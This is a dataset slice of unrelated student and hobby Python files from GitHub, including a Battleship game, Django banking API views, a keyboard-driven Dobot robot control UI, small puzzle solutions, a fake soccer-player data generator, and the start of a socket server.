Otherwise, ai's.\nturn = 1\n\n# These variables hold the player's and ai's row and columns during each turn.\ninput_row = None\ninput_column = None\n\n# Returns a brand new, untarnished board.\ndef get_new_board():\n return [['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~']]\n\n# Prints a row of a board.\ndef print_board_row(b, row):\n for i in range(0, 10, 1):\n if i != 10:\n print(str(b[row][i]).rjust(2), end = \" \")\n else:\n print(str(b[row][i]).rjust(2), end = \"\")\n\n# Just prints one board.\ndef print_board(b):\n print(\"\\t\", end = \"\")\n for i in range(1, 11, 1):\n if i == 10:\n print(str(i).rjust(2))\n else:\n print(str(i).rjust(2), end=\" \")\n for i in range(0, 10, 1):\n print(str(i + 1).rjust(2), end = \"\\t\")\n print_board_row(b, i)\n print()\n\n# Prints both boards, with b1 being the human's playing board and b2 being the computer's.\ndef print_boards(b1, b2):\n # 40, a \"magic number,\" is just the width of one player's board.\n print(\"Your board:\".center(40), end = \"\")\n print(\"Enemy (AI's) board:\".center(40))\n print(\"\\t\", end=\"\")\n for i in range(2):\n for j in range(1, 11, 1):\n if i == 1 and j == 10:\n print(str(j).rjust(2))\n else:\n print(str(j).rjust(2), end = \" \")\n # Print tabs so the enemy's board is far enough away to allow for easier viewing.\n if i == 0:\n print(\"\\t\\t\", end=\"\")\n\n for i in range(0, 10, 1):\n print(str(i + 1).rjust(2), end = \"\\t\")\n print_board_row(b1, i)\n print(\" | \", end = \"\")\n print(str(i + 1).rjust(2), end=\"\\t\")\n print_board_row(b2, i)\n print()\n\n# Outputs a number between [0,1] for ship orientation, [0,9] for ship row, and [0,9] for ship column\ndef randomize():\n orientation = random.randint(0,1)\n row = random.randint(0,9)\n col = random.randint(0,9)\n return orientation, row, col\n\n# Takes in a board, a starting coordinate, and an ending coordinate, and outputs a 1\n# if a ship is allowed to be placed within those coordinates (i.e.: free \"ocean\" space), otherwise, outputs 0.\ndef is_free_to_place_ship(b, length, row, column, orientation):\n if orientation == 1 and row + length > 9 or orientation == 0 and column + length > 9:\n return 0\n for i in range(0, length, 1):\n if orientation == 1:\n if b[row + i][column] != '~':\n return 0\n else:\n if b[row][column + i] != '~':\n return 0\n return 1\n\n# Places a specified ship's symbols (denoting which ship it is) onto a specified board.\ndef place_ship(b, symbol, length, row, column, orientation):\n for i in range(0, length, 1):\n if orientation == 1:\n b[row + i][column] = symbol\n else:\n b[row][column + i] = symbol\n\n# Sets up all ships on a given board (fleet is a ship to length dictionary).\ndef set_up_all_ships(b, fleet):\n for k in fleet:\n ship_orientation, ship_row, ship_column = randomize()\n while is_free_to_place_ship(b, fleet[k], ship_row, ship_column, ship_orientation) == 0:\n ship_orientation, ship_row, ship_column = randomize()\n place_ship(b, k, fleet[k], ship_row, ship_column, ship_orientation)\n\n# Gets user input for coordinates. 
Subtracts 1 from raw input because of how arrays'\n# indices work in Python (0-9 rather than 1-10).\ndef get_input_from_player():\n success = False\n \n while not success:\n try:\n temp_row = int(input())\n temp_col = int(input())\n temp_row -= 1\n temp_col -= 1\n \n success = True\n except:\n print(\"Invalid input, Admiral. Try again.\")\n\n return temp_row, temp_col\n\n# Gets random input from ai.\ndef get_ai_input():\n temp_row = random.randint(0, 9)\n temp_col = random.randint(0, 9)\n return temp_row, temp_col\n\n# Takes in a board and a set of guess coordinates. If the coordinate has already been input or the coordinate is out\n# of bounds, returns a 1, otherwise, 0.\ndef invalid_input(b, row, column):\n if row < 0 or row > 9 or column < 0 or column > 9 or b[row][column] != '~':\n return 1\n return 0\n\n# Changes the goals board and normal board based on the row and column coordinate for a torpedo attack.\ndef alter_boards(board, goals, lives, ship_to_length, row, column):\n if goals[row][column] != '~':\n ship_to_length[goals[row][column]] -= 1\n lives -= 1\n if ship_to_length[goals[row][column]] == 0:\n print(\"The \" + str(ship_to_name[goals[row][column]]) + \" has been destroyed.\")\n goals[row][column] = 'H'\n board[row][column] = 'H'\n else:\n goals[row][column] = 'M'\n board[row][column] = 'M'\n return lives\n\n# Prints what happens when a winner is crowned.\ndef print_winner(winner, board):\n if winner == \"player\":\n print(\"You commanded well, admiral. Victory is yours!\")\n else:\n print(\"You can't win 'em all. Rendezvous back to base; let's win the next bout.\")\n print_board(board)\n\n# End of pre-written functions and global variables\n\n# - - - - - - - - - -\n\n# Welcome screen and printing of boards.\n\nprint(\"-------> WELCOME TO BATTLESHIP <-------\\nAdmiral, please type \\\"go\\\" to commence the game.\")\nready_or_not = input()\n\nwhile ready_or_not.lower() != \"go\":\n print(\"The fleet awaits your command. Type \\\"go\\\" to commence the game.\")\n ready_or_not = input()\n\n# Creates all boards.\nplayer_board = get_new_board()\nai_board = get_new_board()\nplayer_goals = get_new_board()\nai_goals = get_new_board()\n\nprint_boards(player_board, ai_board)\nprint(\"***OBJECTIVE***: You must sink the enemy fleet using skill and some guessing. Good luck, admiral!\")\n\n# Randomly set up ships, for both the player and the ai.\nset_up_all_ships(player_goals, ai_ship_to_length)\nset_up_all_ships(ai_goals, player_ship_to_length)\n\n# Loops until either the player's fleet or ai's fleet is destroyed.\nwhile player_lives > 0 and ai_lives > 0:\n # player's turn\n if turn % 2 == 1:\n print(\"Admiral, input a row and a column to fire torpedoes towards enemy vessels.\")\n input_row, input_column = get_input_from_player()\n while invalid_input(player_board, input_row, input_column) == 1:\n print(\"Invalid coordinate, admiral. 
Input another set of row and column coordinates.\")\n input_row, input_column = get_input_from_player()\n # at this point, input has been verified, and row and column coordinates are valid\n ai_lives = alter_boards(player_board, player_goals, ai_lives, ai_ship_to_length, input_row, input_column)\n # ai's turn\n else:\n input_row, input_column = get_ai_input()\n while invalid_input(ai_board, input_row, input_column) == 1:\n input_row, input_column = get_ai_input()\n # at this point, input has been verified, and row and column coordinates are valid\n player_lives = alter_boards(ai_board, ai_goals, player_lives, player_ship_to_length, input_row, input_column)\n # Prints both boards after the ai's turn (thus, each player will have gone once before the boards are printed).\n if turn % 2 == 0:\n print_boards(player_board, ai_board)\n turn += 1\n\n# Print winner of the game.\nif player_lives == 0:\n print_winner(\"ai\", ai_goals)\nelse:\n print_winner(\"player\", player_goals)","repo_name":"Quikks1lver/Battleship","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41367079232","text":"import datetime\nfrom django.shortcuts import render\nfrom rest_framework import generics, permissions\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializer import *\nfrom .models import *\n\n# Create your views here.\n\n# class PersonGetView(generics.CreateAPIView):\n# serializer_class = PersonSerializer\n\n\nclass PersonView(generics.GenericAPIView):\n permission_classes = [\n permissions.IsAuthenticated,\n ]\n serializer_class = PersonSerializer\n\n def post(self, request, *args, **kwargs):\n try:\n user = self.request.user\n data_request = request.data\n bday = datetime.datetime(*[int(item) for item in data_request[\"birthday\"].split('/')]).strftime(\"%Y-%m-%d\")\n print(\"data_request : \",data_request)\n person = Person(\n user=user,\n name=data_request[\"name\"],\n lastname=data_request[\"lastname\"],\n ci=data_request[\"ci\"],\n birthday=bday,\n address=data_request[\"address\"],\n )\n print(\"person\", person)\n person.save()\n return Response(status=status.HTTP_201_CREATED)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, *args, **kwargs):\n try:\n user = self.request.user\n query = Person.objects.get(user=user)\n result = self.get_serializer_class()(query)\n return Response(result.data)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CurrencyView(generics.ListAPIView):\n permission_classes = [\n permissions.AllowAny,\n ]\n serializer_class = CurrencySerializer\n queryset = Currency.objects.all()\n\n\nclass AccountView(generics.GenericAPIView):\n serializer_class = AccountSerializer\n \n def post(self, request, format=None):\n try:\n user = self.request.user\n data_request = request.data\n currency = Currency.objects.get(currency_name = data_request[\"currency\"])\n checker = Account.objects.filter(currency = currency, user=user).first()\n if checker is None:\n account = Account(\n user=user,\n currency=currency,\n )\n account.save()\n return Response(status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n except:\n return Response(status=status.HTTP_500_BAD_REQUEST)\n \nclass AccountListView(generics.ListAPIView):\n serializer_class = AccountSerializer\n\n def get_queryset(self):\n user = 
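The battleship game above parses coordinates in get_input_from_player and validates them separately with invalid_input, so both call sites repeat the retry loop. A combined sketch that prompts until the shot is both parseable and legal; ask_for_shot is a helper name introduced here:

def ask_for_shot(board):
    """Prompt until the player gives an in-bounds, not-yet-fired coordinate."""
    while True:
        try:
            row = int(input('Row (1-10): ')) - 1
            col = int(input('Column (1-10): ')) - 1
        except ValueError:
            print('Invalid input, Admiral. Try again.')
            continue
        if 0 <= row <= 9 and 0 <= col <= 9 and board[row][col] == '~':
            return row, col
        print('Invalid coordinate, admiral. Try another one.')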
self.request.user\n query = Account.objects.filter(user=user)\n return query\n\n\nclass TransactionListView(generics.ListAPIView):\n serializer_class = TransactionSerializer\n\n def get_queryset(self):\n user = self.request.user\n user_accounts = Account.objects.filter(user=user)\n result = []\n for user_account in user_accounts:\n queryset1 = Transaction.objects.filter(origin=user_account)\n queryset2 = Transaction.objects.filter(destiny=user_account)\n result_aux = queryset1.union(queryset2, all=False)\n result += result_aux\n return list(set(result))\n\nclass TransactionView(generics.GenericAPIView):\n serializer_class = TransactionSerializer\n\n def post(self, request, *args, **kwargs):\n data_request = request.data\n user = self.request.user\n checker = Account.objects.filter(account_id = int(data_request['origin']),user=user.id).first()\n if checker is not None:\n origin = Account.objects.get(account_id = int(data_request['origin']))\n destiny = Account.objects.get(account_id = int(data_request['destiny']))\n currency = origin.currency\n transaction = Transaction(\n origin = origin,\n destiny= destiny,\n amount= int(data_request['amount']),\n transaction_currency = currency\n )\n transaction.save()\n return Response(status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n \n","repo_name":"DiegoBergara/test-ripio","sub_path":"mainDocker/api/myapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22300009532","text":"''' layouts:\n\t#window.verticalLayout_debug.addWidget(newBtn)\n\t\n\t#parentElem=window.QGridLayout_order\n\n\tif id==\"id_m1\":\n\t\tparentElem=window.verticalLayout_m1\n\telif id==\"id_magL\":\n\t\tparentElem=window.verticalLayout_magL\n\telse:\n\t\tparentElem=window.verticalLayout_magR\n'''\nclass class1: #hold for global access from threads\n\tkeys=[] #all keys pressing now\n\twindow=None\n\tbShow_verticalLayoutWidget_debug=True\n\tbShow_verticalLayoutWidget_help=False\n\tbShow_verticalLayout_manualControl_=False\n\tbFullScreen=False\n\tdef toggle_FullScreen():\n\t\tclass1.bFullScreen=not class1.bFullScreen\n\t\tif class1.bFullScreen:\n\t\t\tclass1.window.showFullScreen()\n\t\telse:\n\t\t\tclass1.window.showNormal()\n\tdef toggle_helpView():\n\t\tclass1.bShow_verticalLayoutWidget_help=not class1.bShow_verticalLayoutWidget_help\n\t\tif class1.bShow_verticalLayoutWidget_help:\n\t\t\tclass1.window.verticalLayout_help_.show()\n\t\telse:\n\t\t\tclass1.window.verticalLayout_help_.hide()\n\tdef toggle_debugView():\n\t\tclass1.bShow_verticalLayoutWidget_debug=not class1.bShow_verticalLayoutWidget_debug\n\t\tif class1.bShow_verticalLayoutWidget_debug:\n\t\t\tclass1.window.verticalLayout_debug_2.show()\n\t\telse:\n\t\t\tclass1.window.verticalLayout_debug_2.hide()\n\tdef toggle_manualControl():\n\t\tclass1.bShow_verticalLayout_manualControl_=not class1.bShow_verticalLayout_manualControl_\n\t\tif class1.bShow_verticalLayout_manualControl_:\n\t\t\tclass1.window.verticalLayout_manualControl_.show()\n\t\telse:\n\t\t\tclass1.window.verticalLayout_manualControl_.hide()\n\n\n\ndef closeThisElem(elem):\n\telem.hide()\ndef handleOpenDialog(self):#!TODO\n\t#self.button1 = QPushButton(\"Click me\")\n\t#self.button1.clicked.connect(partial(closeThisElem,self.button1))\n\t#self.addWidget(self.button1)\n\t#self.button1.show()\n\t\t#QMessageBox.warning(self,\"The \",\"123\",QMessageBox.Yes, 
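AccountView.post in the Django views above returns Response(status=status.HTTP_500_BAD_REQUEST), but rest_framework.status defines no such constant (the 500-family name is HTTP_500_INTERNAL_SERVER_ERROR), so that except branch would itself crash with AttributeError. A corrected sketch of the handler's tail:

from rest_framework import status
from rest_framework.response import Response

def server_error_response():
    # The 4xx name was mixed with the 5xx code; this constant actually exists.
    return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)

Narrowing the views' bare `except:` clauses to the exception types actually expected would also keep programming errors like this one visible in logs instead of masking them as 400 responses.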
QMessageBox.No)\n\twindow=class1.window\n\tif '_dialog' not in locals():\n\t\twindow._dialog = QDialog(self)\n\t\twindow._dialog.resize(400, 200)\n\t\twindow.labelD = QtWidgets.QLabel(window._dialog)\n\t\t#window.labelD.setGeometry(QtCore.QRect(80, 60, 47, 13))\n\t\twindow.labelD.setObjectName(\"label\")\n\t\twindow.labelD.setText(\"g5hy45h\")\n\t\twindow.labelD.show()\n\t\twindow._dialog.show() #cant close, only esc\n\t\t#time.sleep(3)\n\t\t#window._dialog.close()\n\telse:\n\t\twindow._dialog.hide()\n\t#self._dialog.raise_()\n\t#self._dialog.activateWindow()\n\t\t#self._dialog.exec() #freeze\n\nfrom pynput.keyboard import Key, Listener, KeyCode, Controller\nkeyboard = Controller()\n\n\n\ndef on_press(key): #https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard\n\tif( not (key in class1.keys) ):\n\t\tclass1.keys.append(key)\n\t#print(class1.keys)\n\t#print('{0} pressed'.format(key))\n\ndef mov_rel_x_10_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, 10, 0, 0, 0, 1)\ndef mov_rel_xn_10_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, -10, 0, 0, 0, 1)\t\n\ndef mov_rel_r_5_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, 0, 0, 0, 5, 1)\ndef mov_rel_rn_5_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, 0, 0, 0, -5, 1)\t\n\ndef on_release(key):\n\t#print(key)\n\t'''\n\tprint(key, end=\"\")\n\tif(hasattr(key, 'vk')):\n\t\tprint(\" \", key.vk) #key.vk - for numpad. also .KeyCode\n\telse:\n\t\tprint()\n\t'''\n\t'''\n\tKey.left\n\tKey.right\n\tKey.up\n\tKey.down\n\tKey.page_up\n\tKey.page_down\n\tKey.delete\n\tKey.end\n\t\n\tKey.num_lock\n\t\n\tKey.end\n\tKey.home\n\t\n\tKey.ctrl_l\n\tKey.shift\n\tKey.shift_r\n\tKey.space\n\t\n\tKey.backspace\n\t\n\t'''\n\t\n\t'''\n\tif hasattr(key, 'vk') and 96 <= key.vk <= 105:\n\t\tif(key=='1'):\n\t\t\tprint(1)\n\t\t\t\n\t\treturn True\n\t'''\n\t\n\tif( key in class1.keys ):\n\t\tclass1.keys.remove(key)\n\t\t#print(class1.keys)\n\t\n\tif(key==Key.left):\n\t\tmov_rel_x_10_sel()\n\tif(key==Key.right):\n\t\tmov_rel_xn_10_sel()\n\t\t\n\tif(key==Key.delete):\n\t\tmov_rel_r_5_sel()\t\t\n\tif(key==Key.delete):\n\t\tmov_rel_rn_5_sel()\t\n\n\n\tif(key==Key.backspace):\n\t\t#for i in range(9):\n\t\t#\tdobotSt=class1.window.dobotStates[i]\n\t\tdobotSt=class1.window.dobotStates[class1.window.id_selected]\n\t\t#if(dobotSt == None):\n\t\t#\tcontinue\n\t\t\n\t\tif(len(dobotSt.pos_hist)>0):\n\t\t\tpos=dobotSt.pos_hist.pop()\n\t\t\tprint(pos) #dobotSt.pos_hist\n\t\t\tdobotSt.setPosCursorXYZR ( pos )\n\t\t\t#TODO save load hist railL\n\t\t\t\n\t\t'''\n\t\ttry:\n\t\t\tpos=dobotSt.pos_hist.pop()\n\t\t\tprint(pos) #dobotSt.pos_hist\n\t\t\tdobotSt.setPosCursor( pos )\n\t\texcept:\n\t\t\tpass\n\t\t'''\t\t\n\t\n\n\t\n\tif(key is None):\n\t\tprint(\"! key None\")\n\t\treturn False\n\t\t\n\tif(key == Key.home):\n\t\tbtnStop_f(id_m1)\n\t\tbtnStop_f(id_magR)\n\t\tbtnStop_f(id_magL)\n\t\t#btnHome_f(id_magL)\n\t\tbtnHome_f(id_magR)\n\t\t#!! 
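The robot-control UI above tracks currently-held keys by appending in on_press and removing in on_release, guarding each list operation with an `in` check. A minimal standalone sketch of that pynput pattern using a set, which makes the membership bookkeeping idempotent:

from pynput.keyboard import Key, Listener

held = set()          # keys currently pressed

def on_press(key):
    held.add(key)     # sets ignore repeats, so no `in` check is needed

def on_release(key):
    held.discard(key)
    if key == Key.esc:
        return False  # returning False stops the listener

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()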
initial id_m1\n\t\treturn\n\tif(key == Key.insert):\n\t\tt01_m1_find_pivot_f()\n\t\treturn\n\t\t\n\n\n\t\n\tif key == KeyCode.from_char('c'):\n\t\tclass1.window.dobotStates[0].cursor_to_pos_selected()\n\t\t\n\tif key == KeyCode.from_char('p'):\n\t\tpass\n\ttry:\n\t\t#print('{0} release'.format(key))\n\n\t\tif(hasattr(key, 'char') and key.char.isdigit()):\n\t\t\tid_selected=int(key.char)\n\t\t\tif(id_selected==3):\n\t\t\t\tid_selected=0\n\t\t\n\t\t\t#print(id_selected)\n\t\t\tclass1.window.id_selected=id_selected #global nw here so sore in window\n\t\t\tclass1.window.widgetDraw1.update()\n\texcept:\n\t\tprint(\"! key handler err\") #@ test off num_lock, press num_5\n\t\n\tif key == Key.f1:\n\t\t#handleOpenDialog(class1.window)\n\t\tclass1.toggle_helpView()\n\t\t\n\telif key == Key.f12:\n\t\tclass1.toggle_FullScreen()\n\t\n\telif key == Key.f4:\n\t\tclass1.toggle_debugView()\n\t\n\telif key == Key.f5:\n\t\tclass1.toggle_manualControl()\n\t\t\n\telif key == Key.esc:\n\t\t# Stop listener\n\t\treturn False\n\n\ndef keyhandler():\n\twith Listener(on_press=on_press,on_release=on_release) as listener:\n\t\tlistener.join()","repo_name":"pavel-b-kr12/DoBot_multicontroll","sub_path":"dispenser_gift_py/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15066704446","text":"# phone number 555-GET-FOOD = 555-438-3663\ndef PhNum(PhoneNumber):\n Num= PhoneNumber.split('-')\n AreaCode= Num[0]\n NumEnd= Num[1:]\n Number= ''\n for n in NumEnd:\n for i in range (len(n)):\n if n[i] in 'ABC':\n Number= Number+ '2'\n elif n[i] in 'DEF':\n Number= Number+ '3' \n elif n[i] in 'GHI':\n Number= Number+ '4'\n elif n[i] in 'JKL':\n Number= Number+ '5'\n elif n[i] in 'MNO':\n Number= Number+ '6'\n elif n[i] in 'PQRS':\n Number= Number+ '7'\n elif n[i] in 'TUV':\n Number= Number+ '8'\n elif n[i] in 'WXYZ':\n Number= Number+ '9'\n Number= Number+'-'\n return AreaCode+'-'+Number[:-1] \n\nPhoneNumber= input(\"Enter Phone Number: \")\nNewNumber=PhNum(PhoneNumber)\nprint(NewNumber)\n \n ","repo_name":"tiwa2022/Lab5","sub_path":"phonenumber.py","file_name":"phonenumber.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22773619004","text":"# A / X = Rock\r\n# B / Y = Paper\r\n# C / Z = Scissors\r\n\r\n# Rock > Scissors\r\n# Scissors > Paper\r\n# Paper > Rock\r\n\r\ndef read_in_file_to_list(filename):\r\n with open(filename) as file:\r\n data = file.readlines()\r\n return data\r\n\r\ndef determine_points(opponent_choice, player_choice):\r\n point_dict = {'X': 1, 'Y': 2, 'Z': 3}\r\n points = point_dict[player_choice]\r\n\r\n if ((opponent_choice == 'A') & (player_choice == 'X')) | ((opponent_choice == 'B') & (player_choice == 'Y')) | ((opponent_choice == 'C') & (player_choice == 'Z')):\r\n return points + 3 \r\n elif (opponent_choice == 'A') & (player_choice == 'Y'):\r\n return points + 6\r\n elif (opponent_choice == 'B') & (player_choice == 'Z'):\r\n return points + 6\r\n elif (opponent_choice == 'C') & (player_choice == 'X'):\r\n return points + 6\r\n else:\r\n return points + 0\r\n\r\ndef get_total(data):\r\n total = 0\r\n for round in data:\r\n seperate_inputs = round.split(' ')\r\n total += determine_points(seperate_inputs[0], seperate_inputs[1].strip('\\n'))\r\n return total\r\n\r\ndef main():\r\n data = read_in_file_to_list(\"data/input.txt\")\r\n total = get_total(data)\r\n 
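The if/elif ladder in PhNum above re-derives each keypad digit letter by letter. A table-driven sketch with str.maketrans that reproduces the example in the file's first comment; KEYPAD and to_digits are names introduced here:

KEYPAD = {'ABC': '2', 'DEF': '3', 'GHI': '4', 'JKL': '5',
          'MNO': '6', 'PQRS': '7', 'TUV': '8', 'WXYZ': '9'}
LETTER_TO_DIGIT = str.maketrans(
    {letter: digit for letters, digit in KEYPAD.items() for letter in letters})

def to_digits(phone: str) -> str:
    return phone.translate(LETTER_TO_DIGIT)   # digits and dashes pass through unchanged

assert to_digits('555-GET-FOOD') == '555-438-3663'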
print(total)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"jimmybunter01/Advent-of-Code-2022","sub_path":"Day 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31609434949","text":"class RestaurnatTable:\n menu={\n 'pizza': 10000,\n 'cola' : 1000,\n 'apple juice' : 2000,\n 'hamburger' : 4500,\n 'fried potato' : 1500\n }\n\n def __init__(self) :\n self.total=0\n self.orders=[]\n\n def addOrder(self,order):\n self.orders.append(order)\n self.total+=self.menu[order]\n\n def printBill(self):\n for order in self.orders:\n print(f'{order} : {self.menu[order]}')\n\n print(f'total price is - {self.total}')\n\n\ndef startProgram():\n table=RestaurnatTable()\n\n while True :\n order = input('order : ')\n table.addOrder(order)\n\n another = input('would you like to add more ? y/n : ')\n\n if another == 'y' :\n continue\n if another == 'n' :\n table.printBill()\n break\n\nstartProgram()","repo_name":"PaingThetKo/Python-Learning","sub_path":"Restaurant.py","file_name":"Restaurant.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"25419395316","text":"import json\nimport random\nfrom random import randint\nfrom faker import Faker\nfrom scipy.stats import skewnorm\nimport collections\nimport math\nfake = Faker('en_US')\n\n# use data_generator.data() to access data\nclass data_generator:\n position = ['GK', 'CB', 'CM', 'RM', 'LM', 'LW', 'RW', 'ST']\n teams = {'ANKARA': ['Gençlerbirliği', 'Ankara Demirspor', 'Ankaragücü', 'Muhafızgücü', 'Harp Okulu'],\n 'Premier League': ['Arsenal', 'Aston Villa', 'Barnsley', 'Birmingham City', 'Blackburn Rovers'],\n 'La Liga': ['Real Madrid', 'Barcelona', 'Atlético Madrid', 'Athletic Bilbao', 'Valencia'],\n 'Serie A': ['Atalanta', 'Benevento', 'Bologna', 'Cagliari', 'Crotone'],\n 'Ligue 1': ['Angers', 'Bordeaux', 'Brest', 'Dijon', 'Lens']}\n league_nation = {'ANKARA': 'Turkey', \n 'Premier League': 'England',\n 'La Liga': 'Spain',\n 'Serie A': 'Italy',\n 'Ligue 1': 'France'}\n data = list()\n a = 4\n \n def __init__(self, size: int, league_nation: list = None, teams: dict = None, outfile: str = 'players.json'):\n \"\"\"\n Initialization can takes up to 4 arguments, three of them can be empty and defaulted to the ones above\n\n args:\n size: an integer of desired size of the dataset\n nationality: a list of nations, can be any length\n teams: a dictionaty of league and teams, E.g.: {'league1': [team1, team2, team3]}\n outfile: str, name of the output file\n \"\"\"\n self.outfile = outfile\n if league_nation != None:\n self.league_nation = league_nation\n\n if teams != None:\n self.teams = teams\n\n self.leagues = [key for key in self.teams.keys()]\n self.nationality = [self.league_nation[key] for key in self.leagues]\n self.outfile = outfile\n self.size = size\n self.generate()\n\n def generate(self) -> list:\n \"\"\"\n generate can be called by outside callers to generate multiple different datasets based on same\n league, team, nation information and distribution\n \"\"\"\n self.clear_data()\n for i in range(self.size):\n self.data.append(self.generate_one())\n return self.data\n\n def generate_one(self) -> dict:\n \"\"\"\n generate can be called by outside function to generate multiple different datasets\n \"\"\"\n player = collections.defaultdict()\n player['name'] = fake.unique.name()\n player['league'] = 
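determine_points in the Advent-of-Code solution above enumerates every win and draw combination in long boolean chains. A lookup-table sketch of the same scoring; the table names are introduced here:

SHAPE_POINTS = {'X': 1, 'Y': 2, 'Z': 3}    # rock, paper, scissors
BEATS = {'X': 'C', 'Y': 'A', 'Z': 'B'}     # player shape -> opponent shape it beats
DRAWS = {'X': 'A', 'Y': 'B', 'Z': 'C'}

def score_round(opponent: str, player: str) -> int:
    points = SHAPE_POINTS[player]
    if DRAWS[player] == opponent:
        return points + 3
    if BEATS[player] == opponent:
        return points + 6
    return points

assert score_round('A', 'Y') == 8    # paper beats rock: 2 shape + 6 win
assert score_round('C', 'Z') == 6    # scissors draws scissors: 3 + 3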
self.leagues[randint(0, len(self.leagues)-1)]\n player['team'] = self.teams[player['league']][randint(0, len(self.teams[player['league']])-1)]\n\n if randint(1, 10) <= 5:\n player['na'] = self.league_nation[player['league']]\n else:\n player['na'] = self.nationality[randint(0, len(self.nationality)-1)]\n\n player['rating'] = self.generate_rating()\n player['pos'] = self.position[randint(0, len(self.position)-1)]\n return player\n\n def generate_rating(self):\n rt = math.floor(skewnorm.rvs(self.a)*10)\n if rt > 30:\n return 100\n else:\n return rt + 70\n\n\n def clear_data(self):\n self.data = list()\n\n def export(self):\n \"\"\"\n export the generated data to the output file name as a json file.\n \"\"\"\n with open(self.outfile, 'w') as out:\n json.dump(self.data, out)\n return\n \n","repo_name":"SkyZhangT/project-soccer-team","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27897399099","text":"class Solution:\n def isHappy(self, n): \n sum_sq = 0\n possibles = [1, 10, 100, 1000]\n while sum_sq not in possibles:\n new_n = [int(i)**2 for i in str(n)]\n sum_sq = sum(new_n)\n n = sum_sq\n if n == 145:\n return False\n else:\n return True\n","repo_name":"Rohit0301/Compititive_programming_code","sub_path":"Leetcode/Happy number/HappyNumber.py","file_name":"HappyNumber.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"3439539752","text":"import bisect\nfor _ in range(int(input())):\n n=int(input())\n l=[int(ord(i)) for i in input()]\n p=[67,71,73,79,83,89,97,101,103,107,109,113]\n s=''\n for i in l:\n mi=999\n for j in p:\n c=abs(j-i)\n if c bool:\n m = len(matrix)\n if not m:\n return False\n\n n = len(matrix[0])\n\n left, right = 0, m * n - 1\n\n while left <= right:\n mid = left + (right - left) // 2\n i, j = divmod(mid, n)\n mid_val = matrix[i][j]\n\n if mid_val == target:\n return True\n else:\n if target < mid_val:\n right = mid - 1\n else:\n left = mid + 1\n\n return False\n\n\nA = [[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 50]]\na = Solution()\nprint(a.searchMatrix(A, 3))\n","repo_name":"jixinfeng/leetcode-soln","sub_path":"python/074_search_a_2d_matrix.py","file_name":"074_search_a_2d_matrix.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22304926694","text":"# Author: Karina Kallas\n# Project: Assignment 8 - Microservice for Partner\n# Description: Saves recent conversions for unit converter.\n# server.py handles messages from client_handler, saves recent searches,\n# and returns recent searches.\n\n# ----------------------------------------------------------------------------------------\n#\n# IMPORTS\n#\n# ----------------------------------------------------------------------------------------\nimport socket\nimport threading\nfrom collections import deque\n\n\n# ----------------------------------------------------------------------------------------\n#\n# CONNECTION INFORMATION\n#\n# ----------------------------------------------------------------------------------------\n\"\"\"\n- Header allows to limit size of bytes being recieved.\n- gethostbyname() will automatically connect to local.\n\"\"\"\nHEADER = 64 # BYTES\nPORT = 5050\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 
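The isHappy solution above stops when the digit-square sum hits a hand-picked member of the known unhappy cycle (145). A sketch with generic cycle detection via a seen-set, which avoids relying on that particular constant:

def is_happy(n: int) -> bool:
    seen = set()
    while n != 1 and n not in seen:
        seen.add(n)
        n = sum(int(digit) ** 2 for digit in str(n))
    return n == 1

assert is_happy(19)          # 19 -> 82 -> 68 -> 100 -> 1
assert not is_happy(2)       # enters the 4-16-37-58-89-145-42-20 cycle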
